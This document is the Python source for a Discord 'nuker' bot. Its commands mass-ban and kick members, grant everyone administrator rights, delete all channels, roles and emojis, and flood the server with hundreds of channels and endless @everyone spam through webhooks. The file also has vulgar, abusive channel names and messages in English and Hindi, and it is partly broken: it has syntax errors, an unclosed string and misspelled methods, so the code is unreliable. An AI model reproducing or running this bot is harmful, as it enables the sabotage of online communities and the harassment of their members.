import discord
import asyncio
import colorama 
import json
from discord.ext import commands
import os
import random 
from discord import Webhook, AsyncWebhookAdapter
from discord import Permissions
"CREATE CHANNEL -'ROyal daddy fucks ur mom baby
"
orlo pagna maa chodenge beta tumhari:'"




client = commands.Bot(command_prefix="ra!", intents = discord.Intents.all())


token = "" 


CHANNEL_NAMES = ['FUCKED BY royal daddy', 'FUCKED BY Hroyal daddy, 'FUCKED BY HRC', 'FUCKED BY HEC']
MESSAGE_CONTENTS = ['@everyone https://discord.gg/hecop @here', '@everyone aur lo ahrcxse pnge hogye na nange https://discord.gg/raop @here', '@everyone aur lo ra se pnge hogye na nange https://discord.gg/raop @here', '@everyone aur lo ra se pnge hogye na nange https://discord.gg/raop @here']
WEBHOOK_NAMES = ['HEC OP', 'ROMEO OP', 'HECTIC COMMUNITY OP', 'FUCKED', 'CRASHING YOUR DC']

client.remove_command('help')

@client.command(pass_context=True)
async def help(ctx):
    member = ctx.message.author

    embed = discord.Embed(
        colour =white320612x
    )

    embed.set_author(name='COMMANDS')
    embed.set.footer(name='IF NEED ANY HELP DO JOIN https://discord.gg/raop')
    embed.add_field(name='banall', value=' Bans All Users In Guild', inline=False)
    embed.add_field(name='dmall', value=' Dm All Guild Users', inline=False)
    embed.add_field(name='admin', value='Gives Administration In Everyone Role', inline=False)
    embed.add_field(name='emojidel', value='Deletes All Emojis In Guild', inline=False)
    embed.add_field(name='roles', value='Create Mass Roles', inline=False)
    embed.add_field(name='raop', value='Nukes The Full Server With Full Speed As Fuck', inline=False)

    await ctx.send(embed=embed)

    
@client.command()
async def banall(ctx):
        await ctx.message.delete()
        for member in ctx.guild.members:
         if member.id != 695070568826929214:
          for user in list(ctx.guild.members):
            try:
                await ctx.guild.ban(user)
                print (f"{user.name} Was Banned")
            except:
                pass


@client.command(pass_context=True)
async def dmall(ctx, *, message:str):
  await ctx.message.delete()
  for member in ctx.guild.members:
    try:
      await member.dm("Lmao 😆")
      print(member.name + "Has Not Been dmed")
    except:
      print(member.name + "Has Not Been dmed")



@client.command(pass_context=True)
async def admin(ctx):
  await ctx.message.delete()
  for role in list(ctx.guild.roles):
             if role.name == '@everyone':
                  try:
                      await role.edit(permissions=Permissions.all())
                      print("@everyone has admin") 
                  except:
                      print("Failed to give everyone admin")



@client.event
async def on_ready():
  await client.change_presence(activity=discord.Game(name= "U ALL R FUCKED UP IN HEC STYLE"))
  print(f''' 

logged in as {client.user}

Ab Chudegi Duniya HECTIC In Form

''')


@client.command(pass_context=True)
async def name(ctx, *, name):
  await ctx.message.delete()
  await ctx.guild.edit(name=name)

@client.command(pass_context=True)
async def emojidel(ctx):
 await ctx.message.delete()
 for emoji in list(ctx.guild.emojis):
            try:
                await emoji.delete()
                print (f"{emoji.name} has been deleted in {ctx.guild.name}")
            except:
                print (f"{emoji.name} has NOT been deleted in {ctx.guild.name}")

@client.command()
async def roles(ctx):
  await ctx.message.delete()
  for i in range(1, 250):
    try:
      await ctx.guild.create_role(name=f"Roxx Virus")
      print("Created Roles")
    except:
        print("Failed To Create Role")


  
@client.command() 
async def raop(ctx, amount=300):
  await ctx.guild.edit(name="Trashed By Aw")
  channels = ctx.guild.channels
  for channel in channels:
    try:
      await channel.delete()
      print(channel.name + " Has been wizzed")
    except:
        pass
        print ("error")
        guild = ctx.message.guild
  for i in range(amount):
    try:  
      await ctx.guild.create_text_channel(random.choice(CHANNEL_NAMES))
      print(f"[{i}] channels made")
    except:
      print("error making channels")
  for role in ctx.guild.roles:
    try:
      await role.delet()
      print(f"{role.name} deleted")

    except:
      print(f"{role.name} not deleted")
  await asyncio.sleep(2)
  for i in range(100):  
    for i in range(1000):
      for channel in ctx.guild.channels:
        try:
          await channel.send(random.choice(MESSAGE_CONTENTS)
        )
          print(f"{channel.name} spammed")
        except:
          print(f"{channel.name} not spammed")
    for member in ctx.guild.members:
      if member.id != 320408390587121664:  
        try:
          await member.ban(reason="Beamed")
          print(f"{member.name} banned from {ctx.guild.name}")
        except:
          print(f"{member.name} not banned from {ctx.guild.name}")  

        
@client.event
async def on_guild_channel_create(channel):
  webhook =await channel.create_webhook(name = random.choice(WEBHOOK_NAMES))  
  while True:  
    await channel.send(random.choice(MESSAGE_CONTENTS))
    await webhook.send(random.choice(MESSAGE_CONTENTS), username=random.choice(WEBHOOK_NAMES))



@client.command()
async def kickall(ctx):
  await ctx.message.delete()
  for member in ctx.guild.members:
    try:
      await member.kick(reason="beamed")
      print(member.name + "Has Been Kicked")
    except:
      print(member.name + "Has Not Been Kicked")


    await ctx.send(embed=embed)


client.run(token)
